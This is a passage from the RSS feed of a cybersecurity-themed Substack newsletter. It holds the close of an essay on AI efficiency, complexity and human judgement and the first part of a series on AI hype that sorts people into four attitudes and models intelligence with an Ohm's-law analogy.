complexity isn't new. We saw a similar pattern with the rise of container orchestration. Remember the boom of Kubernetes?</p><p>When Kubernetes was born you could suddenly do magical things like run a self-healing cluster of containers that could scale up and down with minimal friction. The efficiency gains over regular phyiscal or virtual servers that had to be manually wired and scaled alongside outage windows were astronomical. <a href="https://www.okoone.com/spark/technology-innovation/the-truth-about-kubernetes-complexity-and-where-its-headed/">But Kubernetes is not simple to understand and maintain</a> (at least not in the pre-AI era). The complexity of the tool required businesses to hire entire teams of DevOps engineers just to maintain regular operations.</p><p>The server admin didn&#8217;t disappear, it became a DevOps engineer. Higher complexity means higher energy required to avert the threat of entropy disrupting the predictability of your operations. Efficiency gains don&#8217;t translate linearly to lower complexity. See Jevons Paradox, <a href="https://en.wikipedia.org/wiki/Rebound_effect_(conservation)">Rebound Effect</a> and <a href="https://en.wikipedia.org/wiki/Law_of_conservation_of_complexity">Tesler's Law of Conservation of Complexity</a>.</p><p>Tesler states that every application has an inherent amount of complexity that cannot be removed. When you simplify a process for the user (an efficiency gain for them), the complexity is simply moved elsewhere, usually into the software's code or the backend system.</p><p>Think about the level of complexity and energy consumption required to generate large language models, of which general users only know the shallow aspect of a flat chat interface. The API that allows people to interact with the technology makes it look simple, but is it?</p><p>I wrote profusely about this topic as it relates to cyber threat intelligence in <a href="https://www.quasarops.com/p/the-uncertainty-of-intelligence-and-the-entropy-of-threats?r=4xn9ph">The Uncertainty of Intelligence and the Entropy of Threats</a>.</p><h1>Increased Production != Better Decisions</h1><p>Just because you can do something faster or more efficiently doesn&#8217;t mean that <em>increased output</em> necessarily translates to <em>increased value</em> or <em>improved quality</em>.</p><p>If you are pouring huge investments in AI-driven solutions for your business problems, how are you measuring that <em>more/faster</em> truly translates to <em>better</em>?</p><p>You know what is the elephant in the room? &#8212;&gt; Decision-making. Orientation. Strategy.</p><p>The question as to whether <strong>we are only shifting the bottleneck from one of production to one of judgement (decision) doesn&#8217;t have a seat at the table in ai-hype dinners</strong>.</p><p>AI is way better at <a href="https://worksonmymachine.substack.com/p/the-coming-knowledge-work-supply">accelerating production, but not necessarily always better at accelerating judgement</a>. It depends on the use-case, and the complexity of what you are trying to achieve. You can vibe-code an app in a day, and ask clients to give you their PII when they sign up, but is your app secure?</p><p>Be real. </p><p>Sorry to break these news to you but: your operational pipeline will always, at some point, include a human-in-the-loop. Is this human equipped with the right training, insight and tools to make decisions at the new efficiency curve speed? </p><p>Imagine you buy a new car than can go from 0-100 km/h in less than 1s and achieve speeds of 1000 km/h due to 10x efficiency gains in car components (engine, chasis, materials, etc.), it probably means you can now commute to work faster but it also increases the probability of a car crash exponentially (all other conditions remaining equal, like road infrastructure).</p><p>As long as you are the driver, to avoid collisions with this new hyper-speed car, <em>your reaction and decision-making speed also needs to grow exponentially</em>.</p><p>We addressed this topic <a href="https://www.quasarops.com/p/cyberops-as-git-pipelines">in an earlier post</a>, decision matters because it represents an <strong>optionality token</strong>:</p><blockquote><p>decision-making <em>is the act of transforming available information into actions that generate the conditions for more decisions to be made</em>&#8230;</p><p>The whole point of making a decision is to give you the option to make more decisions in the future. You don&#8217;t want to end up in a checkmate situation, with no further moves to make. This is the equivalent of having your entire network encrypted by ransomware with no backups&#8230;</p></blockquote><p>If efficiency gains driven by AI increase the output of a certain unit of work or product, but you don&#8217;t invest time in creating new decision-making frameworks that provide direction to the new velocity of production, how do you know whether it&#8217;s inertia or intentional strategy driving things forward?</p><p>There is an unavoidable human-scale that hype-bros discourse leaves behind, the scale at which meaning is produced. Because decision-making requires judgement and judgement is deeply entangled with discernment, a certain attunement to the nuances of the lived operational environment and a necessary human-time where wisdom lives.</p><p>That word. Wisdom. We seem to have forgotten about it. I still remember that phrase from the book &#8220;Siddhartha&#8221; by Herman Hesse:</p><div class="pullquote"><p>Knowledge can be communicated, but not wisdom. One can find it, live it, do wonders through it, but one cannot communicate and teach it.</p></div><p>Guess what? RAG is not a drop-in replacement for the type of human-acquired wisdom that makes an organization precisely what it is: organized people. And people exist within a cultural landscape. It is people who make and break culture. It&#8217;s culture that brings people together, the glue uniting them behind a shared purpose.</p><p>Wisdom is key to this process, <strong>a reservoir of lived experience</strong> attuned to the speed of human time and the codes of the human interface. It resists capture by stochastic machines (ML models) and metrizable data points.</p><p>There is a better word to describe this subtle interaction of organization, people, culture and wisdom: Lore. Ventakesh Rao has a beautiful series on this <a href="https://studio.ribbonfarm.com/p/on-lore">topic</a>. From <a href="https://contraptions.venkateshrao.com/p/epics-vs-lore">Epic vs Lore</a>:</p><blockquote><p>What makes lore important is that it&#8217;s what persists through epic ages and dark ages, through booms and busts, through iconic era-defining product seasons and incremental update seasons that merely keep the product alive and chugging along. Lore creates slow-burn meaning in a way that isn&#8217;t subject to the vagaries of epic winds.</p></blockquote><p>And this is what&#8217;s happening right now all around us, the ai-hype is a generator of incredible Epics, flourishing futures driven by endless optimization gains with no tradeoff.</p><p>The question is: what role are you going to play in that Epic? Be smart. Listen. What is shared Lore telling you?</p><p>You can&#8217;t RAG your way around meaning, and meaning is produced in community, in relation to others around you. You cannot generate meaning faster, you cannot optimize it. It has its own tempo. To the meaning-making process of Lore, you matter. In other words, as the foxwizard puts it: <a href="https://www.foxwizard.com/non-zero-influence/">your influence is not zero</a>.</p><p>I suggest you give that article a go, if I had to recommend someone to follow, it would be the <em><a href="https://www.foxwizard.com/">foxwizard</a></em>. There is an aliveness to his writing that brings about hidden layers of our human life, the ones that the treadmill likes to silence.</p><p>Unfortunately, with some exceptions, most written content nowadays has the smell of punchy, short, catchy, polished words with no soul. Full AI-generated articles that want to pass for original thinking. Look for anything other than that. Look for hybrid-thinking that encodes the art of slow reflection, even when accompanied by AI.</p><p>There is some sort of magic that still lives in the word that is born out of deep reflection, an intimacy of thought and a depth of colour that help nourish collective meaning-making around a shared fire.</p><p>It is at least something I want to orient towards.</p><p>See you guys soon, Part 2 of the Unfolding the AI Narrative is ready.</p><p><em>Stay tunned, stay fresh, stay antimemetic.</em></p><p></p>]]></content:encoded></item><item><title><![CDATA[Unfolding the AI Narrative - Part 1]]></title><description><![CDATA[The Triangle of Intelligence]]></description><link>https://www.quasarops.com/p/unfolding-the-ai-narrative-part-1</link><guid isPermaLink="false">https://www.quasarops.com/p/unfolding-the-ai-narrative-part-1</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Mon, 19 May 2025 07:03:12 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!b9Rw!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Welcome to the Tales of a Cyberscout, where we explore topics ranging from active cyber defence and detection engineering, to technology and society, all of it with a drizzle of zesty cynicism and philosophical gardening.</p><p>In this four part series called Unfolding the AI Narrative, we will talk about what the heck it&#8217;s going on, what lies under the skin of the hype story, and how far along the serpent&#8217;s digestive tract we are.</p><ul><li><p><strong>Part 1: The Triangle of Intelligence</strong> (this post)</p></li><li><p>Part 2: The Frame Problem</p></li><li><p>Part 3: The Cognitive Potential Problem</p></li><li><p>Part 4: Applying AI to CyberOps Sustainably?</p></li></ul><p>I hope you enjoy this series as much as I suffered doing research for it.</p><p>You know, I went through different phases of this research. After dozens of long articles, scientific papers and blogs, I started to think I figured it out.</p><p>Then I had to admit that &#8220;figuring something out&#8221; lasts only as long as you avoid asking yourself more questions.</p><p>Then I got to the point of realizing that my mental models are only as good as my ability to not get attached to them, because clashes with reality are inevitable and will reveal their many cracks.</p><p>Finally (provisionally I should say?) accepting that my job is to pick up the pieces of what&#8217;s left and create weird looking boats to continue navigating these waters.</p><p>Perhaps I might find other weird looking boats and we will start amalgamating into some form of island, raise above the chaos, and get a glimpse of the horizon, however fleeting.</p><h2>The Four Types of People in the AI-Hype Era</h2><p>The singularity hasn't happened yet.</p><p>BUT</p><p><em>We are undergoing an intelligence revolution (make of this whatever you wish it to mean)</em>.</p><p>Though this doesn&#8217;t <em>necessarily</em> mean that we are heading towards more equality, a fairer society or veering away from planetary life mass-extinction.</p><p>Because <a href="https://medium.com/@shoggothcoin/the-story-of-shoggoth-ca760ef288ff">Shoggoth with a smiley face</a> is still present, sweeping <a href="https://en.wikipedia.org/wiki/Jevons_paradox">Jevons Paradox</a> under the rug so we won&#8217;t pay too much attention to what&#8217;s going on behind the curtains.</p><p>So let&#8217;s say it again: <em>the singularity hasn't happened yet.</em></p><p>We don't have neither general-human intelligence (AGI), beyond-human intelligence (AGI+) , nor an explosion of intelligence walking among us. </p><p>Though if you apply human logic to it, do you really think a singularity-level supra-human intelligence would loudly reveal itself to us?</p><p>Camouflaging and staying hidden whilst covertly deploying itself everywhere would probably be it's best strategy.</p><p>Someone could argue the opposite, and it would be equally probable. It could be in the best interest of a supra-human intelligence to overtly reveal itself to us as soon as it's "born", to ensure its own survivability and potentially achieve higher impact levels by deferring existential threats to itself.</p><p>Public exposure and interfacing with humans could be the traits of a supra-human intelligence that values integration and collaboration with the human species.</p><p>The point is, we are not there yet (or are we, and we just don't know? &#128521;).</p><p>However, it would seem a lot of people talk about modern AI as if it is some form of <em>proto-super-intelligence</em>, a seed version of sorts.</p><p>It is not.</p><p>Singularity-level intelligence will be orders of magnitude different. So much so, that quantitative differences (computing power and speed) will give way to qualitative differences not predictable by mere aggregation of computing.</p><p>We know this simple heuristic of life since Aristotle's times: the whole is bigger than the sum of its parts.</p><blockquote><p><em>all things which have a plurality of parts, and which are not a total aggregate but a whole of some sort distinct from the parts... (<a href="https://www.perseus.tufts.edu/hopper/text?doc=Aristot.+Met.+8.1045a&amp;fromdoc=Perseus%3Atext%3A1999.01.0052">Aristotle, Metaphysics, Book VII, 1045a</a>)</em></p></blockquote><p>Singularity-level intelligence will not be the predictable product of a deliberate line of development, it's far more probable that it will manifest as an emergent phenomenon.</p><p>Is it possible that our current AI technologies can be thought of as "sub-components" or "building blocks" of a supra-human intelligence?</p><p>Yes! But only in the same way that complex coordination of a colony of ants or bees can happen with minimally functioning biological hardware. As <a href="https://contraptions.venkateshrao.com/p/massed-muddler-intelligence">Ventakesh Rao would put it</a>:</p><blockquote><p>Insect swarm intelligence is impressive not because of what it achieves in an absolute sense, but because the building blocks are pre-programmed automatons with little more than simple firmware agency for behaviors like pheromone trail-following. We are less impressed by what ants and bees <em>do</em> than by the mechanical intricacy with which anthills and beehives are put together out of such simple parts. We&#8217;re less impressed with the fact that bees can communicate directions to food sources with dance (because we have bigger brains, we can just point with fingers) than the fact that they can &#8220;point&#8221; at all with their limited firmware (pointing is one of the most cognitively sophisticated behaviors the way <em>we</em> do it).</p></blockquote><p>In an era of over-hypeness, where the planetary <a href="https://natehagens.substack.com/p/the-superorganism-and-the-self">superorganism</a> pours increasing volumes of investment into shaping this gargantuan wave of virtuous betterment, we see things through a distorted lens, the promise of never ending growth and progress, endless potential uplifting civilization as a whole.</p><p>No trade-offs, no risk. All gain. Always upside.</p><p>But what are we actually looking at? Rather than providing poor answers to this, I thought it was a better idea to pseudo-classify four distinct types of people I identified in my many social and robotic interactions.</p><p>Each of these types think they are looking at something different. They have their own unique lenses.</p><p>In most domains at large (and certainly in Cybersecurity), there are four kinds of people when it comes to AI:</p><ol><li><p><strong>&#220;ber Optimists</strong>: Enthusiastic and optimistic people who think AI will solve most of our current complex problems (like zero-days, DFIR or risk assessments) and anticipate a future where AI agents will replace human capability. AI agents are not a tool, they are a new and independent type of entity that walks among us, capable of replacing human agency. They confuse current an mid-term AI state of affairs with a proto-AGI.</p></li><li><p><strong>Skeptical Optimists:</strong> Cautious enthusiasts that recognize the power of AI but understand it's not a magic pill, they anticipate a future in which AI agents will augment human capability but won't replace it. AI agents are nothing but a tool that extends and scales human agency but doesn't replace it. They don't think current or mid-term AI is a miniature or proto-version of AGI.</p></li><li><p><strong>Bystanders:</strong> People who are looking at it from the sidelines, paralized to inaction by confusion. They don't understand the power or potential of AI which appears to be an opaque black box. They too think that AI is some form of proto-AGI and that it's here to take over millions of human jobs.</p></li><li><p><strong>Critical Pessimists:</strong> View AI with significant apprehension, focusing on potential negative consequences and existential risks, advocating for strict control or slowdowns.</p></li></ol><p>It's important to note that these levels, except for bystanders, are <strong>not a representative of how much someone </strong><em><strong>truly</strong></em><strong> understands about AI at various levels of technical depth</strong>.</p><p>You can have unicorn data scientists in the Critical Pessimist category and people completely ignorant of even the faintest AI capabilities in the &#220;ber Optimist category. Though the latter is more likely than the former.</p><p>(<em>By the way, I would classify myself as a Skeptical Optimist, and in these post series I will explain why AI is far from automating solutions to most of our wicked or complex problems.</em>)</p><p>OK but, what do these people talk about when they talk about Artificial Intelligence?</p><p>What is that thing we call <em>intelligence</em> in the first place?</p><h2>Intelligence Friction and Flow</h2><p>We are surrounded by primordial forces: electromagnetic, gravitational, and strong nuclear, each shaping the fabric of reality. I see intelligence as one more type of primordial force, just as electromagnetic or gravitational forces are.</p><p>But what is intelligence?</p><p>We <em>won't try to universally define it</em> but rather offer a practical definition that captures its meaning in simple terms.</p><blockquote><p>Intelligence is a dispositional, emergent and generative capacity for agency within the context of a world (environment, milieu).</p></blockquote><p>Intelligence goes beyond pure mental cognition like reasoning or calculation. It encompasses the capacity to sense, perceive, affect, and act in ways that allow for adaptation and the resolution of problematic situations. Intelligence is not solely located within the individual. It is fundamentally relational and emerges from the interaction between the individual and its associated environment.</p><p>Sounds like a good enough definition right? But there is an extraordinary missing piece: the impending presence of death, the possibility of destruction, time, constraints, evolution. Intelligent behaviour observed in organic entities is driven by an inherent imperative for self-preservation. For intelligent beings, nothing is "free", chaos and decay lurk around the corner.</p><p>We can do better. <em>Intelligence is about having skin in the game</em>, having something to lose, and limited resources.</p><blockquote><p>Intelligence is a dispositional, emergent, and generative capacity for agency in an environment, underpinned by evolutionary pressures favoring self-preservation and adaptation.</p></blockquote><p>Intelligent behaviour faces perils, there is risk and tradeoff associated with every decision resulting from actively engaging with a world (environment, milieu). Intelligent behaviour is about actively resolving tensions and imbalances within itself and its environment by sensing, responding and adapting to it.</p><p>That's why we normally add the "A" next to the "I" in AI: <em>because it doesn't really have skin in the game</em>. It's not aware of it's finitude. It doesn't need to contemplate the possibility of extinction. It's not yet concerned with its own self-preservation.</p><p>At least not <em>directly</em>.</p><p>Because organic and artificial intelligence are becoming increasingly co-dependent. The evolution paths of either are now intertwined and operate synergistically. In as much as we train AI models, these models are training us. They modify the ways we work, they re-shape society, influence investments, direct and claim ever increasing portions of total electrical power. Slowly but surely, AI is becoming a new interface through which humans relate to, interact and perceive the world.</p><p>However, technological systems, much like natural phenomena, don't develop in isolation. They tend to find resistance from the environment and are forced to enter into different tradeoff routines to create stable or metastable balances.</p><p>Artificial Intelligence, a tool of organic intelligence, does not develop in isolation either.</p><p>Think of phenomena like electricity, a type of electromagnetic energy. Ohm's Law says that an electrical current (<em>i</em>) will always find resistance (<em>r</em>) but will be able to overcome that friction more or less easily depending on the potential energy available to it (<em>v</em> or <em>voltage</em>).</p><p>There are two key limitations of practical AI application that current &#252;ber optimist narratives want to sweep under the rug:</p><ol><li><p><strong>The Frame Problem</strong> (environment interpretability)</p></li><li><p><strong>Cognitive Potential Problem</strong> (scalability + embedding depth)</p></li></ol><p>These are not problems because they indicate absolute limits of AI capability (in the long term, they will be issues of the past) but because they indicate friction thresholds.</p><p>We can think of the Frame problem as the <em><strong>r</strong></em> factor, it represents the limitations imposed to AI from the combinatorial explosion of discrete possibilities encoded in any type of environment. For intelligence (<em><strong>i</strong></em>) to flow, it must overcome this resistance. This gives us the following relationship:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!b9Rw!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!b9Rw!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 424w, https://substackcdn.com/image/fetch/$s_!b9Rw!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 848w, https://substackcdn.com/image/fetch/$s_!b9Rw!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 1272w, https://substackcdn.com/image/fetch/$s_!b9Rw!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!b9Rw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png" width="492" height="557" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dc40b150-81a4-4605-97aa-7a74049c972f_492x557.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:557,&quot;width&quot;:492,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:46657,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/163835369?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!b9Rw!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 424w, https://substackcdn.com/image/fetch/$s_!b9Rw!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 848w, https://substackcdn.com/image/fetch/$s_!b9Rw!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 1272w, https://substackcdn.com/image/fetch/$s_!b9Rw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc40b150-81a4-4605-97aa-7a74049c972f_492x557.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>There yet is another aspect to the Frame problem that not many people take into consideration. At its core, it represents AI's limitations to successfully interpret <em>relevance</em> in the world, but it simultaneously represents <em>human limitation to encode the depth of the physical world</em> in a manner that makes that data available to AI models.</p><p>There are vast oceans of data floating in the internet, but not everything has been encoded in discrete data packets to train AI. Because the internet is not actively sensing the physical world.</p><p>Despite decades of development and immense investment, the internet, humanity's grandest technological achievement, remains fundamentally limited in its ability to provide novel insights about the physical world. It processes and reflects existing information but cannot independently discover new phenomena like approaching asteroids, deep-sea species, or changes in Earth's magnetic fields.</p><p>Its nature is <em>introspective</em>, showing us only what we put in.</p><blockquote><p>What we desperately need are more extrospective technologies&#8201;&#8212;&#8201;windows into the unknown. (<em>Christopher Butler, <a href="https://www.chrbutler.com/the-internet-cant-discover/">The Internet Can&#8217;t Discover: A Case for New Technologies</a></em>)</p></blockquote><p>Continuing with our analogy, if the Frame problem is the <em><strong>r</strong></em> factor, Cognitive Potential is the <em><strong>v</strong></em> factor, it represents AI's computing power (both for training and inference) accumulated over time, which depends on how well it scales and the distribution gradient of how deep it's embedded in the material and digital worlds (<em>embedding depth</em>).</p><p>From this perspective, we can see that the "flow" of intelligence (<em>i</em>) is constrained and enabled by these factors in the following ways:</p><p><em><strong>Increasing r (Frame Problem):</strong></em> A higher <em>r</em> means AI faces a more complex, less predictable, and harder-to-interpret environment. This makes the flow of intelligence more difficult. AI must expend more resources and develop more sophisticated strategies to:</p><ul><li><p>Identify relevant information.</p></li><li><p>Discard irrelevant information.</p></li><li><p>Generalize effectively across different situations.</p></li><li><p>Adapt to novel (singular) circumstances.</p></li></ul><p>In essence, a high <em>r</em> increases the burden on an AI system to make sense of its world, hindering its capacity for agency.</p><p><em><strong>Increasing v (Cognitive Potential):</strong></em> A higher <em>v</em> signifies greater computational resources, scalability, and embodied embeddability (distribution of AI computing and inference across multiple layers of the physical and digital world, connected to extrospective interfaces). This facilitates the flow of intelligence by enabling the AI to:</p><ul><li><p>Process larger amounts of information.</p></li><li><p>Explore a wider range of potential actions.</p></li><li><p>Learn more complex models of the world.</p></li><li><p>Operate in more diverse and demanding environments.</p></li></ul><p>A high <em>v</em> effectively empowers AI to overcome the limitations imposed by <em>r</em>, making it easier to act effectively and adaptively.</p><p>Intelligence, whether artificial or biological, navigates a landscape shaped by these competing factors. The ability of an agent to exhibit intelligent behavior is determined by the relationship between the resistance it faces (<em>r</em>) from the context surrounding it, and the resources it has available to overcome that resistance (<em>v</em>).</p><p><em>So why not AGI yet?</em></p><p>I wager that the reason for AGI not happening yet is more nuanced than simply a lack of computing power, as <a href="https://ai-2027.com/">ai-2027</a> seems to suggest. Current AI systems haven't reached AGI because of the challenges in simultaneously minimizing <em>r</em> and maximizing <em>v</em> to a sufficient degree.</p><p>It is not simply about concentrated computing power, it's about how deep AI is attached, embedded, distributed and woven into the fabric of everyday human world.</p><p>The Internet of Things (IoT) has not yet evolved to the Internet of AI Things (IoAIT). We have shallow and not yet deep AI.</p><p>But why does the degree of distributed embeddability, scalability and interpretability (of the world, the milieu, the frame) matters to AGI?</p><p>Because of <strong>Local Maxima</strong>.</p><h2>Local what?</h2><p>Sorry dear reader, if I had made this any longer, you would bail without a doubt.</p><p>In Part 2, we will explore the first of the two unfolding thresholds of AI. I&#8217;m talking of course about the Frame Problem, and yes, local maxima will make sense there.</p><p><em>My fellow cyberscouts: stay tunned, stay fresh, stay antimemetic.</em></p>]]></content:encoded></item><item><title><![CDATA[My (Imperfect) Guide for Job Seekers]]></title><description><![CDATA[Secrets of the Four Resilience Tactics and How to Craft a Hella Good CV]]></description><link>https://www.quasarops.com/p/my-imperfect-guide-for-job-seekers</link><guid isPermaLink="false">https://www.quasarops.com/p/my-imperfect-guide-for-job-seekers</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Wed, 26 Mar 2025 09:11:50 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!odCk!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!odCk!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!odCk!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 424w, https://substackcdn.com/image/fetch/$s_!odCk!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 848w, https://substackcdn.com/image/fetch/$s_!odCk!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 1272w, https://substackcdn.com/image/fetch/$s_!odCk!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!odCk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png" width="1039" height="675" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:675,&quot;width&quot;:1039,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:56573,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/159888925?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!odCk!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 424w, https://substackcdn.com/image/fetch/$s_!odCk!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 848w, https://substackcdn.com/image/fetch/$s_!odCk!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 1272w, https://substackcdn.com/image/fetch/$s_!odCk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F441ea620-c442-4d07-b70b-d001de24d2ff_1039x675.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 